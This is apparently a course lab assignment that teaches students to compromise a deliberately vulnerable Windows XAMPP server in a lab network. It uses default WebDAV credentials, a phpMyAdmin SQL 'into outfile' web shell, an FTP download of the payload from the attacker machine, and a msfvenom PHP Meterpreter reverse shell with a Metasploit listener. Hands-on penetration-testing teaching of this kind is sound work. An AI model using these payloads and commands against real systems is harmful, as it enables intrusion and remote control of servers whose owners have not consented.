Proj 12: Exploiting PHP Vulnerabilities (15 pts.)

What you need

Purpose

To practice exploiting several vulnerabilities on the Target machine, including PHP vulnerabilities.

Start the VMs

Start both your Kali 2 VM and your Winows 2008 Server Target VM. Log in to both of them. Find the IP address of your target machine and make a note of it.

Test Networking

On the Kali machine, in a Terminal window, execute this command, replacing the IP address with the IP address of your Windows 2008 Server target.
ping 192.168.119.130
You should see replies. If you don't, you need to troubleshoot your networking. If there's a firewall turned on on the target, turn it off.

Press Ctrl+C to stop the pings.


Task 1: Exploiting Default XAMPP Credentials

Scanning the Target with Nmap

On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Windows 2008 Server target. (The -A switch turns on all Advanced options, including banner-grabbing.)
nmap -A 192.168.119.130
This took about 4 minutes when I did it, and showed a lot of these error messages: "WARNING: RST from 192.168.119.130 port 21 -- is this port really open?". Just ignore that and let the scan finish.

When the scan is done, scroll back to see the results for port 80.

As shown below, the server supports DAV, and is running XAMPP version 1.7.2.

XAMPP is a LAMP server (Linux, Apache, MySQL, and PHP), containing many components bundled together for convenience.

As explained here, XAMPP turns on WebDAV by default, with default credentials of wampp and xampp. Often, a server administrator is not using WebDAV and is unaware that it's active, so the default credentials stay unchanged.

Uploading a File with Cadaver

Cadaver is a WebDAV utility, like a command-line FTP client. Kali includes it by default.

On the Kali machine, in a Terminal window, execute this command, replacing the IP address with the IP address of your Windows 2008 Server target.

cadaver http://192.168.119.130/webdav/
Log in with the credentials wampp and xampp, as shown below.

At the "dav:/webdav/>" prompt, execute this command:

help
You see a list of the available commands, including "put", which will upload a file to the server.

On Kali, open a new Terminal window and execute this command:

echo test > /tmp/test.htm
This creates a file named "test.htm".

In your original Terminal window, at the "dav:/webdav/>" prompt, execute this command:

put /tmp/test.htm
The file uploads, as shown below.

To see your file, on Kali, from the menu bar, click Applications, Favorites, IceWeasel, and enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/webdav/test.htm
The file appears, as shown below.

Now you can upload files to the server, and deface a Web page, but it would be even better to get a remote shell on the server.

Code Execution with a PHP File

On your Kali box, in an unused Terminal window, execute this command:
nano /tmp/phpinfo.php
In nano, enter this code, as shown below.
<?php
phpinfo();
?>

Press Ctrl+X, Y, Enter to save the file.

This is a simple PHP file that displays information about the PHP software running on the server. If that file runs, it means that we can upload files and execute them on the server--"Remote Code Execution".

In your original Terminal window, at the "dav:/webdav/>" prompt, execute this command:

put /tmp/phpinfo.php
The file uploads, as shown below.

In IceWeasel, enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/webdav/phpinfo.php
The file appears, as shown below.

As you can see, we don't see the static text in the PHP file--the file's contents are executed and we see the output of the PHP function.

This means we can upload and execute PHP commands on the server.

All we need is a PHP file that does something fun.

Creating a PHP Attack File with Msfvenom

On your Kali box, in an unused Terminal window, execute this command:
msfvenom -l | grep php
There are several PHP payloads available, including php/meterpreter_reverse_tcp, as shown below.

To see the options available for that exploit, execute this command:

msfvenom -p php/meterpreter_reverse_tcp --payload-options
Scroll back to see the basic options, as shown below. The only options we really need are LHOST and LPORT, both referring to our Kali attacker.

On your Kali machine, execute this command. Find your IP address and make a note of it.

ifconfig
On your Kali machine, execute these commands, replacing the IP address with the address of your Kali machine:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.119.131 LPORT=443 -f raw > /tmp/meterpreter.php

head /tmp/meterpreter.php

As shown below, the payload is long and filled with dense PHP code. Thanks to Metasploit, we don't need to understand all that code--we can just use it :).

Starting a Metasploit Listener

On your Kali machine, execute these commands, replacing the IP address with the address of your Kali machine:
msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST 192.168.119.131

set LPORT 443

exploit

Metasploit is now waiting for connections, as shown below.

Uploading and Executing the Attack File

In your original Terminal window, at the "dav:/webdav/>" prompt, execute this command:
put /tmp/meterpreter.php
The file uploads, as shown below.

In IceWeasel, enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/webdav/meterpreter.php
The browser hangs, but the Matasploit listener shows a "Meterpreter session opened" message, as shown below.

We now own the server!

Saving a Screen Image

Make sure IceWeasel is visible, showing a URL that containing "webdav", as shown above, and that the "Meterpreter session opened" message is also visible.

Click on the host machine's desktop.

Press Shift+PrintScrn. That will copy the whole desktop to the clipboard.

Open Paint and paste in the image.

Save the image with the filename "Your Name Proj 12a". Use your real name, not the literal text "Your Name".

YOU MUST SUBMIT AN IMAGE OF THE WHOLE DESKTOP TO GET FULL CREDIT!

Determining Privilege Level

On your Kali machine, at the meterpreter> prompt, execute this command:
getuid
As shown below, we are running as "SYSTEM"--the highest privileged account, more powerful than the Administrator.

Many services run as System, but a Web server should not, for precisely this reason.


Task 2: Exploiting an Open phpMyAdmin Page

Suppose we didn't know the WebDAV credentials. We could still exploit this server via phpMyAdmin.

phpMyAdmin is another convenience incuded in XAMPP, which provides a GUI for MySQL server administration.

On your Kali machine, in IceWeasel, enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/phpmyadmin
You see the phpMyAdmin page, with fields and buttons allowing you to manage MySQL databases, as shown below.

This page should not be exposed to the Internet, as shown in this guide:

How To Install and Secure phpMyAdmin

In the phpMyAdmin page, at the top, click SQL.

We can run SQL queries on the server with this page. Enter this query into the box, as shown below:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"

This SQL query will write a PHP file that executes the "cmd" command into a file named "shell.pmp" on the server.

This amounts to the same thing we were able to do with the default WebDAV credentials.

In the phpMyAdmin page, at the bottom right, click Go.

The phpMyAdmin home page appears.

Open a new IeWeasel tab and enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/shell.php
You see a 'Warning...Cannot execute a blank command" message, as shown below. (My URL contains "shell2.php" because I made a mistake with the first query. If you're careful, that won't happen to you.)

We can't just execute "cmd" -- we need to specify a command to execute.

In IceWeasel, add "?cmd=ipconfig" to the end of the URL, like this:

http://192.168.119.130/shell.php?cmd=ipconfig
You see the output of the IPCONFIG command, as shown below.

Using FTP to Upload Malware

We'd like to upload a more powerful program, such as the "meterpreter.php" attack we created previously.

We could host the file on our Kali box with Apache, but Windows doesn't include any command-line browser tool like wget or curl for us to use.

Real malware often uses FTP to upload files.

Starting an FTP Server on Kali

On Kali, in a Terminal window, execute these commands, which will install vsftpd, create a directory it requires, copy the meterpreter.php file to its default directory, and edit the configuration file:
apt-get update

apt-get install vsftpd -y

mkdir /var/run/vsftpd

mkdir /var/run/vsftpd/empty

cp /tmp/meterpreter.php /srv/ftp

nano /etc/vsftpd.conf

In nano, change
anonymous_enable=NO
to
anonymous_enable=YES
as shown below.

Press Ctrl+X, Y, Enter to save the file.

On Kali, in a Terminal window, execute this command:

vsftpd
Leave this window open.

Creating an FTP Script on the Target Windows Machine

On Kali, in IceWeasel, in the phpMyAdmin page, at the top, click SQL.

Enter this query into the box, as shown below:

SELECT "anonymous", "a@b.com", "lcd C:\xampp\htdocs", "get meterpreter.php" into outfile "C:\\xampp\\htdocs\\script" FIELDS TERMINATED BY '\n'

In the phpMyAdmin page, at the bottom right, click Go.

The phpMyAdmin home page appears.

Open a new IeWeasel tab and enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.

http://192.168.119.130/script
You see a script containing four lines of FTP commands, as shown below.

The first two lines are the username and password for an anonymous logi.

The lcd command changes the local working directory to the home directory for the Web server.

The last command downloads meterpreter.php.

Running the FTP Transfer

Open a new IeWeasel tab and enter this URL, replacing the first IP address with the IP address of your Windows 2008 Server target and the second IP address with the IP address of your Kali machine.
http://192.168.119.130/shell.php?cmd=ftp -s:script 192.168.119.131
You see the output of the FTP commands, ending with "Transfer complete", as shown below.

Starting a Metasploit Listener

On your Kali machine, execute these commands, replacing the IP address with the address of your Kali machine:
msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set LHOST 192.168.119.131

set LPORT 443

exploit

Metasploit is now waiting for connections, as shown below.

Launching the Meterpreter Shell

Open a new IeWeasel tab and enter this URL, replacing the IP address with the IP address of your Windows 2008 Server target.
http://192.168.119.130/meterpreter.php
The browser hangs, but the Metasploit listener should show a "Meterpreter session opened" message. as shown below.

Saving a Screen Image

Make sure IceWeasel is visible, showing a URL that does not contain "webdav", as shown above, and that the "Meterpreter session opened" message is also visible.

Click on the host machine's desktop.

Press Shift+PrintScrn. That will copy the whole desktop to the clipboard.

Open Paint and paste in the image.

Save the image with the filename "Your Name Proj 12b". Use your real name, not the literal text "Your Name".

YOU MUST SUBMIT AN IMAGE OF THE WHOLE DESKTOP TO GET FULL CREDIT!

Turning in your Project

Send the image to: cnit.124@gmail.com with a subject line of "Proj 12 From Your Name", replacing Your Name with your own first and last name. Send a Cc to yourself.

Sources

Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman

Install ftp server on Kali Linux

changing default directory on "vsftp" server

MySQL export into outfile : CSV escaping chars

How to script ftp commands


Posted 10-14-15 by Sam Bowne